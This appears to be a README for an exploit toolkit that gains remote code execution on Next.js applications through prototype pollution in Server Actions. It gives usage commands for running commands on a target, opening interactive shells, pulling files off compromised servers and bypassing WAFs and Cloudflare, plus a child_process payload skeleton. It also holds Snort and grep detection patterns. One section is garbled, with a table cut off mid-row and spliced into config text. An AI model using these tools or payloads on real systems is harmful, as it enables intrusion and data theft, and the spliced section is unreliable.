Share
## https://sploitus.com/exploit?id=ECBDF4EB-1153-5071-842E-3EA665481E35
# React2Shell Scanner
A comprehensive vulnerability scanner and exploitation toolkit for **React Server Components (RSC)** and **Next.js** applications affected by prototype pollution leading to Remote Code Execution.
## โ ๏ธ Disclaimer
**FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING ONLY**
This toolkit is designed for:
- โ
Security researchers conducting authorized penetration tests
- โ
Bug bounty hunters with proper authorization
- โ
System administrators assessing their own infrastructure
- โ
Educational purposes in controlled environments
**DO NOT USE** this tool against systems without explicit written permission. Unauthorized access to computer systems is illegal and punishable by law.
## ๐ Overview
React2Shell exploits prototype pollution vulnerabilities in Next.js Server Actions (CVE-2025-55182 & CVE-2025-66478) to achieve Remote Code Execution on vulnerable Next.js applications (versions โค 15.1.3).
### Affected Versions
- Next.js โค 15.1.3
- Applications using Server Actions
- React Server Components with unsafe form handling
### Attack Vector
The vulnerability exploits `multipart/form-data` handling in Next.js Server Actions to pollute the prototype chain and achieve code execution via the `NEXT_REDIRECT` error mechanism.
## ๐ Features
### Core Scanners
- **scanner.py** - High-fidelity vulnerability detection based on Assetnote research
- **advanced_scan.py** - Multi-endpoint deep scanning with configuration testing
- **react2shell-ultimate.py** - Comprehensive scanner with all features
### Exploitation Tools
- **simple_exploit.py** - Quick single-command RCE for short outputs
- **wait_exploit.py** - Long-running command execution with full output capture
- **shell.py** / **fast_shell.py** - Interactive shell with directory tracking
- **download.py** - File download from compromised servers using base64 encoding
- **curl_exploit.sh** - Bash-based exploitation script
### WAF Bypass & Evasion
- **waf_bypass.py** - Payload encoding variations and path manipulation
- **advanced_waf_bypass.py** - Deep obfuscation with timing attacks
- **smuggling_bypass.py** - HTTP protocol-level bypass techniques
- **cf_bypass.py** - Cloudflare-specific bypass strategies
## ๐ฆ Installation
### Prerequisites
- Python 3.8 or higher
- pip package manager
### Setup
```bash
# Clone the repository
git clone https://github.com/yourusername/react2shell-scanner.git
cd react2shell-scanner
# Create virtual environment (recommended)
python3 -m venv .venv
source .venv/bin/activate # On Windows: .venv\Scripts\activate
# Install dependencies
pip install -r requirements.txt
```
### Dependencies
```
requests>=2.28.0
tqdm>=4.64.0
urllib3>=1.26.0
```
## ๐ป Usage
### Basic Scanning
```bash
# Scan a single URL
python3 scanner.py -u https://target.com
# Scan multiple URLs from file
python3 scanner.py -l sites.txt
# Advanced scan with deep testing
python3 advanced_scan.py https://target.com/app
# Ultimate scanner with all features
python3 react2shell-ultimate.py -u https://target.com
```
### Scanner Options
```bash
# Enable WAF bypass techniques
python3 scanner.py -u https://target.com --waf-bypass
# Scan with multiple threads
python3 scanner.py -l sites.txt -t 20
# Disable SSL verification (for testing)
python3 scanner.py -u https://target.com -k
# Custom headers
python3 scanner.py -u https://target.com -H "Authorization: Bearer token"
# Output results to JSON
python3 scanner.py -l sites.txt -o results.json
# Safe mode (detection only, no RCE)
python3 scanner.py -u https://target.com --safe-check
```
### Exploitation
#### Quick Command Execution
```bash
# Execute single command
python3 simple_exploit.py https://target.com/app whoami
# Execute command with full output
python3 wait_exploit.py https://target.com/app "cat /etc/passwd"
```
#### Interactive Shell
```bash
# Launch interactive shell
python3 shell.py https://target.com/app
# Fast shell with directory tracking
python3 fast_shell.py https://target.com/app
```
#### File Operations
```bash
# Download file from server
python3 download.py https://target.com/app /path/to/remote/file.txt ./local_file.txt
# Using curl script
./curl_exploit.sh https://target.com/app "ls -la"
```
### WAF Bypass
```bash
# Test WAF bypass techniques
python3 waf_bypass.py https://target.com
# Advanced WAF evasion
python3 advanced_waf_bypass.py https://target.com
# HTTP smuggling attempts
python3 smuggling_bypass.py target.com /app
# Cloudflare bypass strategies
python3 cf_bypass.py target.com
```
## ๐ ๏ธ Tool Descriptions
### Scanner Tools
| Tool | Purpose | Key Features |
|------|---------|--------------|
| `scanner.py` | Primary vulnerability scanner | Multi-threaded, RCE verification, JSON output |
| `advanced_scan.py` | Deep application testing | Multiple endpoints, configuration detection |
| `react2shell-ultimate.py` | All-in-one scanner | Combines all detection methods |
### Exploitation Tools
| Tool | Purpose | Best For |
|------|---------|----------|
| `simple_exploit.py` | Quick RCE | Short commands ( [{
source: '/:path*',
headers: [
{
key: 'Content-Security-Policy',
value: "default-src 'self'; script-src 'self'"
}
]
}]
};
```
### For Security Teams
1. **Deploy WAF rules** - Block suspicious `multipart/form-data` patterns
2. **Monitor for exploitation** - Watch for `NEXT_REDIRECT` in error logs
3. **Rate limiting** - Implement aggressive rate limiting on POST endpoints
4. **Network segmentation** - Isolate Next.js servers from sensitive resources
5. **Regular scanning** - Use this tool to audit your infrastructure
### Detection Signatures
**WAF/IDS Rules:**
```
# Detect exploit pattern
alert tcp any any -> any any (msg:"React2Shell Exploit Attempt";
content:"__proto__"; content:"NEXT_REDIRECT";
content:"constructor:constructor";
sid:1000001; rev:1;)
```
**Log Monitoring:**
```bash
# Check for exploitation attempts
grep "NEXT_REDIRECT" /var/log/nextjs/*.log
grep "__proto__" /var/log/nextjs/*.log
grep "constructor:constructor" /var/log/nextjs/*.log
```
## ๐ฏ Technical Details
### Exploit Mechanism
1. **Prototype Pollution**: Exploit sends crafted `multipart/form-data` with `__proto__` keys
2. **Constructor Hijacking**: Pollutes `_formData.get` to reference `constructor:constructor`
3. **Code Injection**: Injects malicious code into `_response._prefix`
4. **Execution Trigger**: Forces `NEXT_REDIRECT` error to execute payload
5. **Output Exfiltration**: Captures command output in `X-Action-Redirect` header
### Payload Structure
```javascript
// Simplified exploit payload
var res = process.mainModule.require('child_process')
.execSync('command').toString();
throw Object.assign(new Error('NEXT_REDIRECT'), {
digest: `NEXT_REDIRECT;push;/login?a=${res};307;`
});
```
### Detection Method
The scanner detects vulnerabilities by:
1. Sending specially crafted Server Action requests
2. Looking for `303 See Other` status codes
3. Checking for `X-Action-Redirect` headers
4. Verifying command execution via unique markers
## ๐ References
- [Assetnote Research: React2Shell](https://www.assetnote.io/)
- [CVE-2025-55182](https://cve.mitre.org/)
- [CVE-2025-66478](https://cve.mitre.org/)
- [Next.js Security Advisory](https://nextjs.org/security)
- [OWASP Prototype Pollution](https://owasp.org/www-community/vulnerabilities/Prototype_Pollution)
## ๐ค Contributing
Contributions are welcome! Please follow these guidelines:
1. Fork the repository
2. Create a feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add new bypass technique'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Open a Pull Request
### Development Setup
```bash
# Install development dependencies
pip install -r requirements.txt
# Run tests (if available)
python -m pytest tests/
# Format code
black *.py
```
## ๐ License
This project is released for **educational and authorized security testing purposes only**.
By using this software, you agree to:
- Only test systems you own or have explicit permission to test
- Comply with all applicable laws and regulations
- Use the tool responsibly and ethically
- Not use the tool for malicious purposes
**NO WARRANTY**: This software is provided "as is" without warranty of any kind.
## โก Changelog
### v1.0.0 (December 2025)
- Initial release
- Core scanner implementation
- Multiple exploitation tools
- WAF bypass capabilities
- Interactive shell support
- File download functionality
- Comprehensive documentation
## ๐ฅ Authors
- Security Research Team
- Based on research by Assetnote Security
## ๐ Acknowledgments
- **Assetnote Security Research Team** - Original vulnerability research
- **Next.js Team** - Prompt security patches
- **Security Community** - Testing and feedback
## ๐ง Contact
For security issues or responsible disclosure:
- Open a GitHub issue (for non-sensitive matters)
- Contact the maintainers privately (for security concerns)
---
**Remember**: With great power comes great responsibility. Use this tool ethically and legally.
โญ If this tool helped you in your security research, consider giving it a star!